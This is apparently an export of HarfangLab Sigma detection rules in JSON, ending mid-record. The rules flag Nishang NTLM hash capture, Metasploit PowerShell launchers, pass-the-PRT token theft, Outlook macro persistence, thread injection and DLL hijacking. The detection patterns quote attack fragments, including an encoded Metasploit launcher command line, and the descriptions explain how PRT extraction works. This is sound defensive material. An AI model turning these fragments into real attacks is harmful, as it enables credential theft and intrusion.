"content": "title: Malicious PowerShell Nishang Start-CaptureServer\nid: eeafa996-2f93-4255-92a8-ee0893f25649\ndescription: |\n Detects the malicious Start-CaptureServer cmdlet, generally associated with the Nishang framework.\n This script is specifically developed to capture NTLMv2 hashes.\n APT28 (aka Fancy Bear) is known to use a customized version of Nishang's Start-CaptureServer PowerShell script and to transmit the stolen hashes via the mocky API to Mockbin.\n It is recommended to investigate all the PowerShell commands associated with the process, and the parent process for suspicious activities.\nreferences:\n - https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1212/\ndate: 2023/09/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.t1212\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.ThreatActor.APT28\n - classification.Windows.Framework.Nishang\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '@(0x4e,0x54,0x4c,0x4d,'\n - '$context = $listener.GetContext()'\n - '$NTLMType2Response = ?NTLM ? + [Convert]::ToBase64String($NTLMType2)'\n - '$response.AddHeader(?WWW-Authenticate?, $NTLMType2Response)'\n - '$listener.Stop()'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eeafa996-2f93-4255-92a8-ee0893f25649",
"rule_name": "Malicious PowerShell Nishang Start-CaptureServer",
"rule_description": "Detects the malicious Start-CaptureServer cmdlet, generally associated with the Nishang framework.\nThis script is specifically developed to capture NTLMv2 hashes.\nAPT28 (aka Fancy Bear) is known to use a customized version of Nishang's Start-CaptureServer PowerShell script and to transmit the stolen hashes via the mocky API to Mockbin.\nIt is recommended to investigate all the PowerShell commands associated with the process, and the parent process for suspicious activities.\n",
"rule_creation_date": "2023-09-14",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1212"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eee0e55e-e901-418f-bc61-5d51a8cf1925",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076975Z",
"creation_date": "2026-03-23T11:45:34.076977Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076982Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://serverfault.com/questions/367166/allow-rdp-for-user-from-commandline",
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_rdp_user_added.yml",
"content": "title: User Added to RDP Users Group via net.exe\nid: eee0e55e-e901-418f-bc61-5d51a8cf1925\ndescription: |\n Detects RDP permissions being given to a user through the \"net\" utility.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to investigate if the user is expected to be added to this group and to look for other suspicious actions by the parent process.\nreferences:\n - https://serverfault.com/questions/367166/allow-rdp-for-user-from-commandline\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - attack.persistence\n - attack.t1098\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n OriginalFileName: 'net1.exe'\n CommandLine|contains|all:\n - ' localgroup'\n - ' /add'\n\n selection_group:\n CommandLine|contains:\n - 'Remote Desktop Users'\n - 'Utilisateurs de gestion à distance'\n - 'Utilisateurs du Bureau à distance'\n\n exclusion_ccm:\n ProcessAncestors|contains: '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n\n exclusion_wmi:\n ProcessAncestors|contains:\n - '|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wbem\\WmiPrvSE.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n\n 
exclusion_dagent:\n ProcessAncestors|contains: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n exclusion_landesk:\n ProcessAncestors|contains: '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistbat.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eee0e55e-e901-418f-bc61-5d51a8cf1925",
"rule_name": "User Added to RDP Users Group via net.exe",
"rule_description": "Detects RDP permissions being given to a user through the \"net\" utility.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to investigate if the user is expected to be added to this group and to look for other suspicious actions by the parent process.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eeee4874-47a8-4bbc-8367-54a2d46d25b5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297489Z",
"creation_date": "2026-03-23T11:45:35.297492Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297496Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/",
"https://github.com/dirkjanm/ROADtoken",
"https://attack.mitre.org/techniques/T1550/001/"
],
"name": "t1550_001_azure_pass_the_prt_via_browsercore.yml",
"content": "title: Azure Pass-the-PRT via BrowserCore.exe\nid: eeee4874-47a8-4bbc-8367-54a2d46d25b5\ndescription: |\n Detects a suspicious BrowserCore.exe process creation which could indicate a pass-the-PRT attempt.\n A PRT (Primary Refresh Token) provides SSO on Azure AD joined, registered, or hybrid joined devices for both web browsers and native apps.\n BrowserCore.exe is a core component of Windows and it serves as a browser add-on that allows Microsoft users to connect via Azure and Microsoft websites.\n Threat actors can exploit BrowserCore.exe by launching the process, sending a request through its standard input, and extracting the PRT (labeled “x-ms-RefreshTokenCredential”) from its standard output.\n The obtained PRT can then be used as a cookie to access sensitive cloud resources on behalf of the victim user.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/\n - https://github.com/dirkjanm/ROADtoken\n - https://attack.mitre.org/techniques/T1550/001/\ndate: 2026/03/09\nmodified: 2026/03/12\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1550.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessOriginalFileName: 'BrowserCore.exe'\n\n exclusion_legit_browser_usage:\n ProcessParentProcessName: 'cmd.exe'\n ProcessParentCommandLine|contains: '> \\\\\\\\.\\\\pipe\\\\'\n ProcessGrandparentProcessName:\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'vivaldi.exe'\n - 'comet.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eeee4874-47a8-4bbc-8367-54a2d46d25b5",
"rule_name": "Azure Pass-the-PRT via BrowserCore.exe",
"rule_description": "Detects a suspicious BrowserCore.exe process creation which could indicate a pass-the-PRT attempt.\nA PRT (Primary Refresh Token) provides SSO on Azure AD joined, registered, or hybrid joined devices for both web browsers and native apps.\nBrowserCore.exe is a core component of Windows and it serves as a browser add-on that allows Microsoft users to connect via Azure and Microsoft websites.\nThreat actors can exploit BrowserCore.exe by launching the process, sending a request through its standard input, and extracting the PRT (labeled “x-ms-RefreshTokenCredential”) from its standard output.\nThe obtained PRT can then be used as a cookie to access sensitive cloud resources on behalf of the victim user.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2026-03-09",
"rule_modified_date": "2026-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef105561-121c-4adb-8707-a231a60db162",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295727Z",
"creation_date": "2026-03-23T11:45:35.295730Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit",
"https://attack.mitre.org/techniques/T1137/"
],
"name": "t1137_outlook_load_macro_boot.yml",
"content": "title: Outlook Configuration Changed to Allow Macro Execution on Startup\nid: ef105561-121c-4adb-8707-a231a60db162\ndescription: |\n Detects a modification of the Outlook configuration to allow macro code execution on startup.\n If the value is set to 1, VBA code from files located in %appdata%\\Microsoft\\Outlook\\ is executed on startup.\n It is recommended to determine if this is a wanted action by the system administrator or third party software, and if so, to whitelist the product or script responsible for the action.\n If it is part of a persistence attempt, it is recommended to revert the configuration change and to look for other suspicious actions on the host.\nreferences:\n - https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit\n - https://attack.mitre.org/techniques/T1137/\ndate: 2026/02/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\S*\\Software\\Microsoft\\Office\\\\*\\Outlook\\LoadMacroProviderOnBoot'\n Details: 'DWORD (0x00000001)'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_office:\n ProcessOriginalFileName:\n - 'Outlook.exe'\n - 'WinWord.exe'\n - 'MSACCESS.EXE'\n - 'Excel.exe'\n - 'POWERPNT.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n 
condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef105561-121c-4adb-8707-a231a60db162",
"rule_name": "Outlook Configuration Changed to Allow Macro Execution on Startup",
"rule_description": "Detects a modification of the Outlook configuration to allow macro code execution on startup.\nIf the value is set to 1, VBA code from files located in %appdata%\\Microsoft\\Outlook\\ is executed on startup.\nIt is recommended to determine if this is a wanted action by the system administrator or third party software, and if so, to whitelist the product or script responsible for the action.\nIf it is part of a persistence attempt, it is recommended to revert the configuration change and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2026-02-03",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1137"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef1115af-eb3a-4fbd-9cc9-66401a672e40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071328Z",
"creation_date": "2026-03-23T11:45:34.071330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071335Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_remote_thread_uncommon_process.yml",
"content": "title: Suspicious Remote Thread Created from Uncommon Process\nid: ef1115af-eb3a-4fbd-9cc9-66401a672e40\ndescription: |\n Detects remote threads that are not mapped to a legitimate DLL/executable and created in an uncommon process.\n Adversaries may inject malicious code in web browsers (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials. If the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\n It is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/11\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n SourceImage|endswith:\n # Office\n - '\\winword.exe'\n - '\\excel.exe'\n - '\\powerpnt.exe'\n - '\\outlook.exe'\n # Web browsers\n - '\\chrome.exe'\n - '\\msedge.exe'\n - '\\firefox.exe'\n - '\\iexplore.exe'\n - '\\plugin-container.exe'\n # Adobe\n - '\\acrobat.exe'\n - '\\AcroCEF.exe'\n # Web servers\n - '\\w3wp.exe'\n - '\\httpd.exe'\n - '\\apache.exe'\n - '\\mysql.exe'\n\n filter_module:\n StartModule|contains:\n - '.dll'\n - '.exe'\n - '.com'\n\n exclusion_firefox_flash:\n SourceImage|endswith: '\\firefox.exe'\n TargetImage|contains:\n - 'FlashPlayerPlugin'\n - 'pingsender.exe'\n\n exclusion_edge:\n SourceImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n TargetImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n\n exclusion_chrome:\n SourceImage|endswith: '\\Google\\Chrome\\Application\\chrome.exe'\n TargetImage|endswith: 
'\\Google\\Chrome\\Application\\chrome.exe'\n\n # TargetProcess fields not yet available\n # exclusion_chrome_smime:\n # TargetProcessCommandLine|contains: 'SmimeOutlookWebChrome\\Microsoft.Outlook.StdioListeningNativeApp.exe'\n # TargetImage|endswith: '\\cmd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef1115af-eb3a-4fbd-9cc9-66401a672e40",
"rule_name": "Suspicious Remote Thread Created from Uncommon Process",
"rule_description": "Detects remote threads that are not mapped to a legitimate DLL/executable and created in an uncommon process.\nAdversaries may inject malicious code in web browsers (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials. If the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\nIt is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef8015cf-cdc5-4872-ba60-ed79840c063e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069753Z",
"creation_date": "2026-03-23T11:45:34.069755Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069760Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/tactics/TA0002/",
"https://attack.mitre.org/techniques/T1564/"
],
"name": "t1564_suspicious_executable_extension.yml",
"content": "title: Process Executed with Suspicious File Extension\nid: ef8015cf-cdc5-4872-ba60-ed79840c063e\ndescription: |\n Detects execution of an executable with a suspicious extension.\n Attackers may rename executable files with a benign extension to hide malicious payloads as legitimate files.\n This technique can also be used to lure users into clicking on the file that would then be executed using another technique (e.g. default application tampering).\n It is recommended to analyze the parent and child processes to look for malicious content or actions.\n It is also recommended to investigate the process responsible for writing the file to disk.\nreferences:\n - https://attack.mitre.org/tactics/TA0002/\n - https://attack.mitre.org/techniques/T1564/\ndate: 2021/10/13\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '.txt'\n - '.pdf'\n - '.doc'\n - '.docx'\n - '.ppt'\n - '.pptx'\n - '.iso'\n - '.xls'\n - '.xlsx'\n - '.xlsm'\n - '.zip'\n - '.rar'\n - '.7z'\n - '.pdf.scr' # https://twitter.com/ankit_anubhav/status/1552325050212093953\n\n condition: selection\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef8015cf-cdc5-4872-ba60-ed79840c063e",
"rule_name": "Process Executed with Suspicious File Extension",
"rule_description": "Detects execution of an executable with a suspicious extension.\nAttackers may rename executable files with a benign extension to hide malicious payloads as legitimate files.\nThis technique can also be used to lure users into clicking on the file that would then be executed using another technique (e.g. default application tampering).\nIt is recommended to analyze the parent and child processes to look for malicious content or actions.\nIt is also recommended to investigate the process responsible for writing the file to disk.\n",
"rule_creation_date": "2021-10-13",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef915928-c4a8-4228-9280-d6772e046120",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073208Z",
"creation_date": "2026-03-23T11:45:34.073210Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073214Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-framework/blob/b0455d36e3a1e7c687d3358526e727586d5d4ccc/modules/exploits/windows/smb/psexec.rb#L134",
"https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/smb/client/psexec.rb#L255",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_metasploit_powershell_launcher.yml",
"content": "title: Metasploit PowerShell Launcher Detected\nid: ef915928-c4a8-4228-9280-d6772e046120\ndescription: |\n Detects suspicious PowerShell script block patterns that are related to the Metasploit Attack Framework.\n Metasploit is a widely-used penetration testing and exploitation framework that provides tools for vulnerability assessment, exploitation, privilege escalation, and post-exploitation activities.\n It is recommended to investigate the PowerShell script, terminate associated processes, and conduct memory analysis.\nreferences:\n - https://github.com/rapid7/metasploit-framework/blob/b0455d36e3a1e7c687d3358526e727586d5d4ccc/modules/exploits/windows/smb/psexec.rb#L134\n - https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/smb/client/psexec.rb#L255\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2020/11/03\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Metasploit\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_2:\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -w hidden -noni -e \n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -nop -w hidden -e \n CommandLine|contains: ' -nop -w hidden '\n selection_3:\n CommandLine|contains:\n # Hx4sIA = Gzip Magic in base64\n # Handle POWERSHELL:encode_final_payload being active or not.\n - \" -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIA\"\n # Same as previous line but with POWERSHELL:encode_inner_payload = true\n - '-e 
JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEA'\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef915928-c4a8-4228-9280-d6772e046120",
"rule_name": "Metasploit PowerShell Launcher Detected",
"rule_description": "Detects suspicious PowerShell script block patterns that are related to the Metasploit Attack Framework.\nMetasploit is a widely-used penetration testing and exploitation framework that provides tools for vulnerability assessment, exploitation, privilege escalation, and post-exploitation activities.\nIt is recommended to investigate the PowerShell script, terminate associated processes, and conduct memory analysis.\n",
"rule_creation_date": "2020-11-03",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef941845-bc17-47b0-ad9a-b00bef1d37b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596942Z",
"creation_date": "2026-03-23T11:45:34.596948Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596969Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_diskraid.yml",
"content": "title: DLL Hijacking via diskraid.exe\nid: ef941845-bc17-47b0-ad9a-b00bef1d37b2\ndescription: |\n Detects potential Windows DLL Hijacking via diskraid.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'diskraid.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - 